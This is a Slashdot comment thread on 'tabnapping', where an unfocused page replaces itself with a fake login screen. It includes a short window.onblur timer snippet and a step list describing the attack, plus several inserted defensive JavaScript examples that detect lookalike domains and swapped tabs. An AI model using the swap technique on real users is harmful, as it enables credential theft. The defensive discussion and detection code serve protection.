      The easy solution: Use a completely different browser for your banking. Banking & only banking is done with that browser.

    65. Re:Umm... by TheThiefMaster · · Score: 1

      Why not leave HSBC? Barclays' online banking uses a card reader that generates a unique code every time, and requires your bank card and pin. They used to use "enter your online pin (different from your card pin), and pick the 3rd, 4th, and 11th characters of your secret phrase off these dropdowns", but they decided to come up with an actually modern security system. Now, logging into online banking isn't much more hassle than using a cash machine, but still very secure.

      Setting up money transfers and recurring payments through the online banking also requires authentication from the card reader device (you have to put the amount into the device too), so even if someone manages to get into your account somehow they still can't steal your money without your card and pin (with which they could just use a cash machine anyway).

      It really is hard to fault.

    66. Re:Umm... by Anonymous Coward · · Score: 0

      What idiot thought it was a good idea to design a web browser so that this was possible?

    67. Re:Umm... by John+Hasler · · Score: 1

      > ...nobody can be perfect.

      It doesn't matter if someone can be perfect as long as many people are not.

      --
      Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
    68. Re:Umm... by Anonymous Coward · · Score: 0

      Will this method work if you browse all the time in Private mode because isn't it supposed to be not remembering your history?

    69. Re:Umm... by mcgrew · · Score: 1

      I stand corrected. That's what I love about this place, sometimes I learn stuff.

    70. Re:Umm... by Golddess · · Score: 1

      It could be that this won't work when a page from Site B tries to load in a window/tab opened by a page from Site A, but there's this thing called a "target" that can be specified in HTML forms. By clicking a link that utilizes a "target", a new window/tab opens up, and any other link that references the same "target" will also open in that same window/tab.

      --
      "I'm not sure I like the fugnutish tone you used in your post!" -RogL (608926)-
    71. Re:Umm... by stonewallred · · Score: 1

      My question, as a non-geek/tech guy, is that if it is a site I use all the time, won't the clue be that my stuff ain't autofilled? When I go to any site on my home computer, I am always logged into common sites, either skipping the log in page or in some cases my data is filled in at the log in page. So will this fool the browser into thinking it is the correct page and throw my user/pw into the fields, or will it recognize it? And I use FF, noscript and ABP.

    72. Re:Umm... by Anonymous Coward · · Score: 0

      People should just get into the habit of looking at the address bar before typing passwords into any page.

    73. Re:Umm... by Anonymous Coward · · Score: 0

      That's the font makers' fault for being too lazy to differentiate the characters. The crossbars on the letter I are not serifs. Unicode probably has at least 50 other vertical bar characters to sneak past us.
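
      The lookalike problem raised in comments 63 and 73 (PayPal.com vs PayPaI.com, and the Cyrillic and other vertical-bar characters that render the same) is something a defender can check for. The following is an added example, not code from this thread or from any browser or add-on: it folds visually confusable characters into one canonical "skeleton" and compares the registrable domain of a hostname against a constructed watchlist of domains you log into. The confusables map is deliberately small, the registrable-domain rule is a two-label approximation, and the watchlist entries (paypal.com, yourbank.com) are constructed for the example.

```javascript
// Added example, not code from the thread or from any browser or add-on.
// A defender-side lookalike check for the "PayPal.com vs PayPaI.com" problem:
// fold characters that render alike into one canonical form, then compare the
// registrable domain against a watchlist of domains the user logs into.

// Characters folded to the ASCII letter they are commonly mistaken for.
// Applied after lowercasing, so a capital I has already become i.
// Deliberately small; a real implementation would use the Unicode TR39
// confusables table.
const CONFUSABLES = new Map([
  ['i', 'l'], ['1', 'l'], ['|', 'l'],                  // i, digit one and bar look like l
  ['0', 'o'],                                          // digit zero looks like o
  ['\u0430', 'a'], ['\u0435', 'e'], ['\u043e', 'o'],   // Cyrillic a, e, o
  ['\u0440', 'p'], ['\u0441', 'c'], ['\u0455', 's'],   // Cyrillic r(p), s(c), dze(s)
  ['\u0443', 'y'], ['\u0445', 'x'],                    // Cyrillic u(y), kha(x)
  ['\u0131', 'l'],                                     // dotless i, folded like i
]);

// Canonical "skeleton" of a hostname: two names with the same skeleton are
// expected to look the same to a reader in common fonts.
function skeleton(hostname) {
  const lowered = hostname.normalize('NFKC').toLowerCase();
  let out = '';
  for (const ch of lowered) out += CONFUSABLES.has(ch) ? CONFUSABLES.get(ch) : ch;
  return out;
}

// Registrable domain approximated as the last two labels. Good enough for
// .com-style suffixes; a real check would consult the Public Suffix List.
function registrable(hostname) {
  return hostname.split('.').filter(Boolean).slice(-2).join('.');
}

// Classify a hostname against a watchlist of lowercase registrable domains
// (constructed list for this example). Returns one of:
//   trusted             exact match on the registrable domain
//   lookalike           different name, same skeleton as a watched domain
//   brand-in-subdomain  a watched domain used as a subdomain of something else
//   unknown             none of the above
function classifyHost(hostname, watchlist) {
  const lowered = hostname.normalize('NFKC').toLowerCase();
  const reg = registrable(lowered);
  if (watchlist.includes(reg)) {
    return { verdict: 'trusted', hostname: hostname, lookalikeOf: null };
  }

  const sk = skeleton(reg);
  const twin = watchlist.find(w => skeleton(w) === sk);
  if (twin) {
    return { verdict: 'lookalike', hostname: hostname, lookalikeOf: twin };
  }

  // Everything left of the registrable domain, e.g. "yourbank.com" in
  // yourbank.com.badguy.ru, wrapped in dots so whole labels are matched.
  const prefix = '.' + lowered.split('.').filter(Boolean).slice(0, -2).join('.') + '.';
  const borrowed = watchlist.find(w => prefix.includes('.' + w + '.'));
  if (borrowed) {
    return { verdict: 'brand-in-subdomain', hostname: hostname, lookalikeOf: borrowed };
  }

  return { verdict: 'unknown', hostname: hostname, lookalikeOf: null };
}
```

      The exact match is tested before the skeleton match so that the real site is never reported as a lookalike of itself. Note that browsers usually display non-ASCII labels in punycode (xn--...) when a label mixes scripts, so the Cyrillic case is mostly a concern for names shown outside the address bar (e-mail bodies, page text, tab titles).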

    74. Re:Umm... by Anonymous Coward · · Score: 0

      Guess I'm a "most paranoid user." I close Firefox, thereby deleting all my history, cookies, etc. both before and after visiting my bank's site.

    75. Re:Umm... by cshay · · Score: 1

      I don't think it is helpful to tell people to change their browsing habits (I have 150 tabs open right now, many from the same sites and I like it like that). People use software in many different ways that suit them. Better to just fix this problem in the browser.

    76. Re:Umm... by Pentium100 · · Score: 1

      Both of my banks have two level security. One is they give you a user ID, semi-permanent password (you have to change it sometimes) and a card with multiple passwords. When you log in, you have to type your user ID, password and then they ask for a specific password from the card (type password #5). When you want to do a wire transfer to an account that belongs to someone else you have to type in a password from the card. So, the attacker has to know at least 3 passwords to be able to do the transfer (main one, two from the card and hope that the server asks for those two).

      If you want, you can buy a key generator for ~$7 and no longer use the card. In this case you type your password to the generator and the generated one time key in place of your password at the bank.

    77. Re:Umm... by Anonymous Coward · · Score: 0

      Solution: never go to any important web site when you have other bullshit websites open. Kill the browser, wait the 10-30 seconds for it to really die, and open a new one. Then go directly to the site you want, preferably by typing in the URL (in case they figure out a way to change your bookmarks).

      Better yet, use a different account, which you only use for banking and/or a small number of other important sites; in Linux, Win7, and XP it's easy to create a user account for that single purpose.

      Better yet, use a separate, old/cheap computer running a recent Ubuntu and Firefox, and don't ever use that machine for anything else (this is really the only way to guard against keyloggers and similar).

      Better yet, rip the hard drive out of the old computer, password-protect the BIOS, and boot from a CD (Knoppix or something), so there's no NV storage for a virus. Always cold boot before you pay your bills. I wonder if there's a way to physically write-protect an SSD - is there a jumper? 16 GB SSD's are cheap and can boot Linux in seconds.

      It depends on your comfort level, and what you're protecting. Going to websites where money is at stake while you have 30 other tabs open in the browser is asking for trouble (and using a different window doesn't help, it's all the same program underneath). Doing it from a Windows computer which you also use for random surfing is questionable, given the prevalence of key loggers and similar nonsense. And no, doing it from Linux running in a VirtualBox on your infested rootkitted windows machine doesn't help, all the keystrokes and screen images pass through the loggers and scrapers running on the host OS, you lose.

      None of the above approaches really work for protecting your email account, or other things you use while you're also doing other work; you're not going to use a separate machine exclusively for email or chatting. But if your comms are that sensitive, you ought to be working on a clean machine anyway - get a separate machine for junk surfing, stay on safe sites on the work box, and be careful what "helpful" utilities you download and install. If you must day-trade 24/7 with money that matters, same thing - the only really safe solution is a separate, clean computer. The only way a computer stays clean is to limit what you do with it (web sites visited, programs installed, SONY music CDs played, etc) to known-safe activities, and make sure you're firewalled (and preferably air gapped and/or turned off when not in use). What makes it tough is that any Youtube video or web site with a Flash ad can probably infect you; to be really safe you probably have to severely limit even normal work-related web based research to a few known good sites. That's hard for any work that requires research.

      But I'm not paranoid ;-)

    78. Re:Umm... by del_diablo · · Score: 1

      Tab 8? It's marked as "read", and would flash if it altered. So yes I would know.

    79. Re:Umm... by Anonymous Coward · · Score: 0

      would flash if it altered

      What plugin are you using to alert you when the contents change? That could be pretty useful for all these rapidshare sites where you have to wait 10 minutes before the javascript reveals the download button.

  2. Nab the tab? by Anonymous Coward · · Score: 1, Insightful

    This is why it's so important to check the address of the site you're about to log into.

    1. Re:Nab the tab? by Anonymous Coward · · Score: 0

      This is why it's so important to check the address of the site you're about to log into.

      Even better: type in the address of the site you're about to log into. Especially if it's a bank or something equally important.

  3. We need death squads by commodore64_love · · Score: 1

    People who do this crap of stealing people's accounts or identities should be shot.

    --
    "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
    1. Re:We need death squads by PhongUK · · Score: 3, Funny

      How do we identify them?

    2. Re:We need death squads by commodore64_love · · Score: 1

      On second thought, since government does sometimes convict innocent people, let's avoid the death penalty. Let's make these creeps lifelong indentured servants to whomever they have harmed. I wouldn't mind having the guy who stole my credit card and purchased $4000 at Walmart serve as my maid for a summer.

      --
      "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
    3. Re:We need death squads by Chrisq · · Score: 1

      People who do this crap of stealing people's accounts or identities should be shot.

      How do we identify them?

      Why not ask the RIAA. They identify lots of copyright infringers. What could possibly go wrong.

    4. Re:We need death squads by Anonymous Coward · · Score: 0

      You watched that Seinfeld episode again, didn't you?

    5. Re:We need death squads by Anonymous Coward · · Score: 0

      I wouldn't mind having the guy who stole my credit card and purchased $4000 at Walmart

      Hahahaha. Couldn't have happened to a more deserving person. Maybe Alex Jones will go ask the reptilians to loan you the money?

    6. Re:We need death squads by AndrewBC · · Score: 2, Funny

      New plan: steal my own identity sloppily under the guise of your identity which I stole perfectly. Now polish my boots!

    7. Re:We need death squads by WrongSizeGlass · · Score: 1

      New plan: steal my own identity sloppily under the guise of your identity which I stole perfectly. Now polish my boots!

      Now, that is just evil. Go to your room and think about what you've ... um, on the other hand, stop thinking about that stuff before you come up with an even more devilish plan.

    8. Re:We need death squads by Anonymous Coward · · Score: 0

      I wouldn't mind having the guy who stole my credit card and purchased $4000 at Walmart serve as my maid for a summer.

      You dirty pervert!

    9. Re:We need death squads by vlueboy · · Score: 1

      On second thought [...] Let's make these creeps lifelong indentured servants to whomever they have harmed. I wouldn't mind having the guy who stole my credit card and purchased $4000 at Walmart serve as my maid for a summer.

      I surely would enjoy having fat geeks around my house calling me "Master!"... just because they're wearing this.

      PS: Please call me if you find slender female scammers! There's all these animes I've been watching...

    10. Re:We need death squads by Anonymous Coward · · Score: 0

      So they can steal the rest of your stuff???

  4. Sneaky... by fuzzyfuzzyfungus · · Score: 3, Interesting

    Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.

    And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common (if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.

    You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.

    1. Re:Sneaky... by jamesh · · Score: 1

      Obviously, this won't subvert SSL certs or anything

      Are there any browser addons that alert you when you are entering a password into a non-SSL site? That would reduce this problem unless the bad guys got SSL certs or compromised websites with SSL certs, which is less common. And even then, the addon could flash something down the bottom like "entering password for yourbank.com" vs "entering password for yourbank.com.badguy.ru". You'd have to be observant but less actively so.
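
      The check jamesh is asking for can be sketched in a few lines. What follows is an added example, not code from this thread and not any existing add-on: a function that works out where a password typed into a form would really be sent (the form's action resolved against the page URL, as the browser resolves it) and produces the "entering password for yourbank.com" line he describes, with a warning when the target is not HTTPS or is a different origin from the page. The URLs yourbank.com and yourbank.com.badguy.ru are the ones from the post; collector.badguy.ru is a constructed value. The DOM wiring at the bottom only runs inside a browser page.

```javascript
// Added example, not code from the thread or from any browser add-on.
// Models the "entering password for <host>" warning jamesh describes:
// before a password is typed, work out where the form really sends it.

// pageUrl: location.href of the page holding the form.
// formAction: the form's action attribute; empty or relative values
// resolve against the page URL, exactly as the browser would resolve them.
function describePasswordSubmission(pageUrl, formAction) {
  const page = new URL(pageUrl);
  const target = new URL(formAction || '', page);
  const warnings = [];
  if (target.protocol !== 'https:') {
    warnings.push('password would be sent without TLS over ' + target.protocol.replace(':', ''));
  }
  if (target.origin !== page.origin) {
    warnings.push('form posts to a different origin: ' + target.origin);
  }
  return {
    pageHost: page.hostname,          // the hostname a status line should show
    targetHost: target.hostname,      // where the credentials actually go
    secure: warnings.length === 0,
    warnings: warnings,
    message: warnings.length === 0
      ? 'entering password for ' + page.hostname
      : 'entering password for ' + page.hostname + ' (WARNING: ' + warnings.join('; ') + ')',
  };
}

// Browser-side glue: runs only inside a page (skipped under Node). A real
// add-on would render a status bar; console.warn stands in for it here.
if (typeof document !== 'undefined') {
  document.addEventListener('focusin', function (ev) {
    const el = ev.target;
    if (el && el.type === 'password' && el.form) {
      const verdict = describePasswordSubmission(
        location.href, el.form.getAttribute('action') || '');
      console.warn(verdict.message);
    }
  });
}
```

      The point of showing page.hostname rather than the tab title is that the title and favicon are exactly what a tabnapping page forges; the hostname in the address bar is not under the page's control. The "different origin" warning catches forms that post credentials elsewhere even on an HTTPS page.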

    2. Re:Sneaky... by ArsenneLupin · · Score: 1

      Obviously, this won't subvert SSL certs or anything;

      Nor would it need to. This is not an attack on the connection (or routing, or DNS), but on the user's "laziness" to double-check the URL if for some reason he believes he entered it himself an hour ago. Of course, the SSL certificate would match the URL... but the URL won't be the URL of the bank.

    3. Re:Sneaky... by Hurricane78 · · Score: 1

      but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.

      Well, there is a natural process that stops that behavior very quickly. It’s called natural selection. It forces people to either wise up and care, or be weeded out very quickly.

      But as long as we add additional layers of idiot protection bubble wrap, we deliberately hinder this process. And then we whine that people act that way.
      They only act efficient in the situation that is around them. If they don’t need to care and know, why should they? It’s thrown away resources. You are gonna do it for them anyway. And you nicely respond to the screams of being entitled to it too.
      They are neither dumb nor ignorant. It simply is a comfortable strategy for them.

      It has gotten so bad, that when you treat people normal and fair, instead of doing the above, you are labeled asocial. To add insult to injury, those labeling you this way, are themselves asocial by unfairly treating those “protected people” preferentially with that above assistance.

      The core thing is, that people usually help others, because that indirectly helps everything, including themselves. It’s a model with an incredible success, especially for humans. And it’s good that way.
      But above problem comes from taking this behavior too far. Into regions where it’s hurting us all instead.

      So the best thing to do, is the counter-intuitive behavior, of simply letting them feel the consequences of their behavior a bit. So they can learn to cope with it themselves.
      If you don’t want to be a dick, you do this slowly, so they can keep up. Instead of letting them fall in a hole when you go away.
      Maybe they lose a little money, or get a shock that is big enough to remember this for the next time.

      And you will see, that after a time, natural selection and their (to that point unused) extreme intelligence will solve the thing in no time. :)

      --
      Any sufficiently advanced intelligence is indistinguishable from stupidity.
    4. Re:Sneaky... by Anonymous Coward · · Score: 0

      Then you go to the source of the problem. The ISP hosting these phishing sites. There should be a unified system where these URL's and domains (along with IP and ISP info) can be tagged. Here's how I think it should work, just off the top of my head:

      1. After a few users report/tag a URL as a phishing attempt, _everyone_ starts getting warned about this specific URL.
      2. After enough reports, this warning escalates to the domain.
      3. And finally, if enough domains hosted by an ISP or IP range are reported, all of them get reported.

      For this to work effectively, you also need participation of domain registrars or whatever. Or the IP leasing people. So that ISP's can't just re-lease new IP ranges or something.

      Also, you need company registration agency's participation to register ISP's. Again, to prevent re-registration of new ISP names etc.

      It has to be a comprehensive solution, otherwise whatever attempt we make will have to be "hit the potato", and watch it pop up somewhere again later.

      I've come across this scenario many times. There are solutions to so many problems out there right now. The reason they are not being fixed is that no one is willing to fix it fully, or spend enough money to fix it fully.

      -XcepticZP

  5. This is one of those stupidly smart things. by Securityemo · · Score: 3, Informative

    You see this, and think "Why didn't someone think about this before?"

    --
    Emotions! In your brain!
    1. Re:This is one of those stupidly smart things. by supersloshy · · Score: 2, Interesting

      You see this, and think "Why didn't someone think about this before?"

      Tab Mix Plus has had locked tabs for a while now. I'm not entirely sure if this fixes the issue of tabnapping, but it looks like it might.

      --
      "Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
    2. Re:This is one of those stupidly smart things. by mysidia · · Score: 1

      I'm sure NoScript will help also. Why does Firefox even allow a script to manipulate tabs other than ones it opened?

    3. Re:This is one of those stupidly smart things. by WrongSizeGlass · · Score: 1

      NoScript will help because this is done via simple javascript. The 'tab' is not manipulated - a new front-most 'div' appears that displays the fake login screen. I'm sure the same type of thing could be accomplished by changing the document.location via a timer rather than displaying a new div.

      The tech behind this type of scam is not new by any means ... it's just that the concept is different.

    4. Re:This is one of those stupidly smart things. by mysidia · · Score: 1

      So, if a legitimate page is loaded in a tab, how is a new DIV painted on top of it by an outside source?

      Doesn't that violate the same origin policy, with regards to the scripting?

    5. Re:This is one of those stupidly smart things. by WrongSizeGlass · · Score: 1

      The page the exploit takes you to is not legitimate, it just looks legit because it loads a copy of the correct site's login page ... then swaps them if you leave the tab.

    6. Re:This is one of those stupidly smart things. by mysidia · · Score: 1

      Not talking about the page something takes you to.

      I'm talking about the page you start on.

      An exploit page loaded later should have no control of what is displayed in the body of a legitimate page in another tab.

    7. Re:This is one of those stupidly smart things. by WrongSizeGlass · · Score: 1

      The name they use for this is misleading - it has nothing to do with other tabs. It only requires you to leave the malicious page you initially landed on. You don't need to go to a new tab, all you need to do is go to a new tab or page or other application, as long as the malicious page/tab loses focus - it uses the window.onblur() event:
      * You land on a malicious page, usually from a legit looking fake e-mail
      * The malicious page displays HTML copied/scraped/etc from the legit site the e-mail was faking
      * You go to another tab, window or application
      * After 5 seconds (in the demo) the malicious page replaces its content with the 'scam' login for either the original page it displayed or another site (such as Gmail, Facebook, etc)
      * When you return to the malicious "tab" you encounter the scam login.

    8. Re:This is one of those stupidly smart things. by ShadowRangerRIT · · Score: 2, Informative
      To be clear, this isn't manipulating another tab. The sequence of events is:
      1. User opens link to seemingly innocuous but malicious site in Tab 1
      2. User goes to Tab 2 to do some other work (tab 2 is immaterial to this; it would work just as well if they switched to another application long enough to forget what they were doing in the browser)
      3. Malicious site in Tab 1 detects that it is unobserved, and replaces itself with a seemingly legitimate log-in page; this need not require a refresh with appropriately designed CSS and JavaScript, so you won't even see any action in the tab bar if you happen to be looking.
      4. User returns to Tab 1, assumes he opened the log-in screen for some reason and enters user name and password

      Now, in a two tab scenario, this sequence of events is unlikely. But for a user with 30 tabs open, there is a non-negligible chance that they forget what was on tab 17, and assume they had some reason to log-in to that site. People are really good at justifying actions that make no sense; just because they don't remember opening the site doesn't mean they won't come up with a reason why they would have. If they aren't aware of this exploit and forgot what was on the tab, they'd have little reason to be suspicious.

      Basically, this isn't a Firefox specific exploit. Any tabbed browser that doesn't disable all JavaScript by default will behave this way. NoScript and similar extensions will help, but a clever website designer might design the page to be useless without JavaScript. There are enough websites like that that a sufficiently interested user might whitelist it, if only temporarily, and some small percentage of those users may succumb to the trap.

      --
      $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
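
      Step 3 of ShadowRangerRIT's sequence is the one a browser-side watchdog can observe. Here is an added example, not code from this thread or from any browser or extension: it records what the tab's login surface looked like the last time the user was looking at it, and when the window regains focus compares that with the current state. The attack never navigates, so the hostname stays the same; the tell is a password field (and usually a new title) that was not there before. The comparison is written over plain data so it can be run outside a browser; the DOM glue at the bottom only runs inside a page. Hostnames and titles in the test are constructed.

```javascript
// Added example, not code from the thread or from any browser or extension.
// A watchdog for the "page swaps itself while unobserved" step: remember the
// tab's login surface when it loses focus, compare when focus comes back.

// Snapshot built from plain data so the comparison can run outside a browser.
// forms: array of { hasPassword: boolean, action: string }
function takeSnapshot(host, title, forms) {
  const loginForms = forms.filter(f => f.hasPassword);
  return {
    host: host,
    title: title,
    passwordFields: loginForms.length,
    formTargets: loginForms.map(f => f.action).sort(),
  };
}

// Compare the snapshot taken when the tab was last in front with one taken
// on return. A newly appeared password field, or a login form posting
// somewhere new, is suspicious; a title change alone is reported but is too
// common (unread counts, tickers) to act on by itself.
function compareSnapshots(lastSeen, onReturn) {
  const findings = [];
  let suspicious = false;
  if (onReturn.passwordFields > lastSeen.passwordFields) {
    suspicious = true;
    findings.push('a password field appeared while the tab was not in front');
  }
  if (onReturn.formTargets.some(t => !lastSeen.formTargets.includes(t))) {
    suspicious = true;
    findings.push('a login form now posts somewhere new: ' + onReturn.formTargets.join(', '));
  }
  if (onReturn.title !== lastSeen.title) {
    findings.push('title changed from "' + lastSeen.title + '" to "' + onReturn.title + '"');
  }
  return { suspicious: suspicious, host: onReturn.host, findings: findings };
}

// Browser glue (skipped under Node): build a snapshot from the live DOM.
function snapshotFromDocument(doc, loc) {
  const forms = Array.from(doc.querySelectorAll('form')).map(f => ({
    hasPassword: f.querySelector('input[type=password]') !== null,
    action: new URL(f.getAttribute('action') || '', loc.href).href,
  }));
  return takeSnapshot(loc.hostname, doc.title, forms);
}

if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  let lastSeen = snapshotFromDocument(document, location);
  // Same trigger the swap uses (loss of focus): record what the user last saw.
  window.addEventListener('blur', function () {
    lastSeen = snapshotFromDocument(document, location);
  });
  window.addEventListener('focus', function () {
    const verdict = compareSnapshots(lastSeen, snapshotFromDocument(document, location));
    if (verdict.suspicious) {
      // A real extension would overlay a banner; the hostname is the fact that matters.
      console.warn('This tab changed while you were away. Address bar says: '
        + verdict.host + '. ' + verdict.findings.join('; '));
    }
  });
}
```

      The snapshot is refreshed on blur rather than only at load because the swap in the demo fires on a timer after blur, so the state at the moment focus is lost is still the innocuous content. Legitimate sites that show a session-timeout login after inactivity will trip this too; the banner still does its job, because it names the real hostname next to the login form.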
    9. Re:This is one of those stupidly smart things. by Anonymous Coward · · Score: 0

      Doubtful. This attack just refreshes the information already in the page, which that info page specifically says it can do, even on a "frozen" page.

      - Pitabred (ac because I modded)

    10. Re:This is one of those stupidly smart things. by Qzukk · · Score: 1

      So, if a legitimate page is loaded in a tab, how is a new DIV painted on top of it by an outside source?

      No no no, your legitimate page is loaded in Tab 18. Or was it 32 or 3 or... well, that doesn't matter. What matters is that the Evil Site on Tab 6 now looks like a login page for a site that you've been to before (detected by :visited). And you were logged into gmail on Tab 6, right? Right???

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    11. Re:This is one of those stupidly smart things. by Garble+Snarky · · Score: 2, Informative

      The locking prevents the user from navigating to another page. I don't think it has any effect on scripts that were initially loaded with the page.

    12. Re:This is one of those stupidly smart things. by mysidia · · Score: 1

      Hm.. suggested fix.

      Sites with real login pages should change their design, so that when a window with a login page displayed loses focus, the login page disappears, and the user is directed to type the URL of the front page into their address bar again, in order to login.

      This can also be considered a security feature... the user might have typed their username/password in and accidentally left the page that way.

      By forcing the user to go back to the login page URL, they are guaranteed a fresh login form every time, and can't accidentally leave credentials partially typed.

    13. Re:This is one of those stupidly smart things. by mysidia · · Score: 1

      If I was logged into it, why on earth would it be prompting me to login again ?

      It wouldn't.... the display of a new login prompt is inherently suspicious.

    14. Re:This is one of those stupidly smart things. by ShadowRangerRIT · · Score: 1
      A couple problems:
      • We'd need to train users to expect that behavior or we'd derive no benefit from it
      • It makes for a really shitty user experience. For a banking website people would understand, but for Gmail? Half the people I know keep Gmail open in a tab all the time and switch back and forth; this would drive them batty.

      As I noted, this would still require user education (so they recognize that good UI means scammer, which is a really fscked up association), so as long as we're relying on that, we may as well just educate them to always recheck the address bar before providing login details. Same benefit, no needlessly awful user experience, no need to make changes. It won't work either way (if your solution is more educated users, then it's untenable for any product offered to the general public), so we may as well not take away functionality.

      --
      $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
    15. Re:This is one of those stupidly smart things. by mysidia · · Score: 1

      It's no problem... the user is already logged in, so there is no need to ever present them a login prompt again (until some later date when they close their browser).

    16. Re:This is one of those stupidly smart things. by Qzukk · · Score: 1

      the display of a new login prompt is inherently suspicious

      And you KNOW it's a new login prompt because you memorize every single page in every single tab, even those pages where you middle click a link to read later, and if just one of those 30 tabs were out of place, you'd know right away?

      Protip: everyone else isn't you.

      Average Joe wouldn't have bothered to memorize which tab had which page, so if he saw a page that looked like his bank website telling him he's logged out due to inactivity and he needs to log back in, he wouldn't think "wait, I was logged in on tab 8 not tab 23" he'd probably try to log back in.

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    17. Re:This is one of those stupidly smart things. by mysidia · · Score: 1

      Average Joe wouldn't have bothered to memorize which tab had which page

      Um.. problem: Average Joe doesn't know about tabbed browsing in the first place, let alone clicking or opening 30 tabs.

    18. Re:This is one of those stupidly smart things. by Qzukk · · Score: 1

      Um.. problem: Average Joe doesn't know about tabbed browsing in the first place, let alone clicking or opening 30 tabs.

      That's ok, it works with multiple windows too.

      But I'm fairly certain the average tabbed browser user has better things to do with their time than sit there and memorize the content of every tab in order. Looking through the other posts here, it basically boils down to "I have a system" (ie gmail is ALWAYS the first tab on the left, so a gmail "logged out for inactivity" screen somewhere else is wrong) or "I haven't got a clue what I opened in which tab".

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    19. Re:This is one of those stupidly smart things. by LordSnooty · · Score: 1

      Suggested workaround - reload any page that has timed out using your menu bar favicon bookmarks before entering information.

  6. Tabnapping by DarkKnightRadick · · Score: 1

    Without having RTFA:

    That sounds a lot more complicated as you'd need to hack at least one high traffic website, read the cookies stored by the browser, and then force a meta-refresh only when the user isn't looking.

    --
    "There is a way that seems right to a man, but its end is the way of death." Proverbs 16:25 (NKJV)
    1. Re:Tabnapping by Anonymous Coward · · Score: 0

      Well you should have RTFA.

    2. Re:Tabnapping by WrongSizeGlass · · Score: 2, Informative

      Changing it when you're not looking is done very easily:
      var TIMER;
      window.onblur = function () {
        TIMER = setTimeout(changeItUp, 5000);
      };

      BTW, this isn't just a Firefox issue; he's only tested it in Firefox. It also works in Safari and IE 7 but didn't take in Chrome 5 (Mac).

    3. Re:Tabnapping by Anonymous Coward · · Score: 0

      RTFA before commenting.

    4. Re:Tabnapping by Endo13 · · Score: 1

      It also doesn't appear to be working in Chrome 4 on WinXP.

      --
      There is no -1 Disagree mod. Slashdot.org/faq defines mod options. USE IT.
    5. Re:Tabnapping by DarkKnightRadick · · Score: 1

      Probably, but the submission gave me enough info to talk about the subject.

      --
      "There is a way that seems right to a man, but its end is the way of death." Proverbs 16:25 (NKJV)
    6. Re:Tabnapping by DarkKnightRadick · · Score: 1

      Still, you're going to be targeting a group of people who regularly use tabs.

      Though this sounds as if it would work if anything took the focus from the window and not just the tab. Am I incorrect about this?

      --
      "There is a way that seems right to a man, but its end is the way of death." Proverbs 16:25 (NKJV)
  7. Come On by tralflamadore · · Score: 1

    He could have come up with something a little less douchey than "tabnapping". Next thing you know, everyone will be saying, "I've been tabnapped!"

    1. Re:Come On by Anonymous Coward · · Score: 0

      Boobquake has been tabnapped by a Viral Market! Quick, get out your Web 2.0 strategies!

    2. Re:Come On by Rashdot · · Score: 1

      Worse if someone creates a fix and calls it 'tabnapkin'.

      --
      This is not the sig you're looking for.
  8. disabling scripts on unfocused tabs? by roman_mir · · Score: 4, Interesting

    Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.

    But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I have 'seen' this done 10 years ago to gain access to some chat accounts.

    1. Re:disabling scripts on unfocused tabs? by The+MAZZTer · · Score: 1

      Except this would break AJAX applications that need to send heartbeats, such as chat applications.

    2. Re:disabling scripts on unfocused tabs? by jafiwam · · Score: 1

      Maybe, as an option with a white list for sites. I say this because Slashdot would be completely useless if there weren't options. It takes 90 seconds to load all the crap scripting in Firefox if there are more than 100 or so comments. One of the nice things about using tabs is that one window can contain whatever slow-assed crap I am trying to pull up researching some dumb error or other. Having the tab do nothing while not being viewed would remove 99% of the usefulness of tabs.

    3. Re:disabling scripts on unfocused tabs? by tokul · · Score: 1

      Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.

      AJAX, automatic page reloads, download counters on file sharing sites

    4. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 2, Insightful

      white listing is not an impossible concept, or is it?

    5. Re:disabling scripts on unfocused tabs? by jellomizer · · Score: 1

      Except for the fact that the Web Browser, like it or not, is more than just a web browser; it is an interface platform for applications. You can bitch and moan all you want. However, the Web Apps are here and they are going to stay for a long time. Every time you try to block a security issue you close another door for honest development. So the easy fix of saying you can cross-script to other tabs or windows sounds like an easy fix... It really isn't.

      --
      If something is so important that you feel the need to post it on the internet... It probably isn't that important.
    6. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 1

      White-listing of sites would fix that problem.

    7. Re:disabling scripts on unfocused tabs? by Lunix+Nutcase · · Score: 1

      But highly inconvenient to many users so they will get mad and disable such a feature thus negating the entire purpose.

    8. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 1

      I don't know who is bitching or moaning, but the suggestion is totally reasonable when provided with a white-list, so the sites you want to run scripts on background will be able to if the browser warns the user that there are scripts on the background that await execution and that switching from the tab will stop them.

      Then the proverbial: Cancel/Allow or something to that effect would add this site to a white-list.

      So, no need for your dramatic epithets.

    9. Re:disabling scripts on unfocused tabs? by tepples · · Score: 1

      Then how do you play online games or use chat features on social sites?

      They would update in one huge refresh a second after you switch back to them.

    10. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 1

      Do you think that a dialog, warning a user who is switching from one screen to another with a 'allow always/never/this time/stay on this page' in case a site is running scripts on the background and then white-listing the site if the 'allow always' button is pushed is such an outrageous concept?

      Maybe then the users deserve to have their private information stolen.

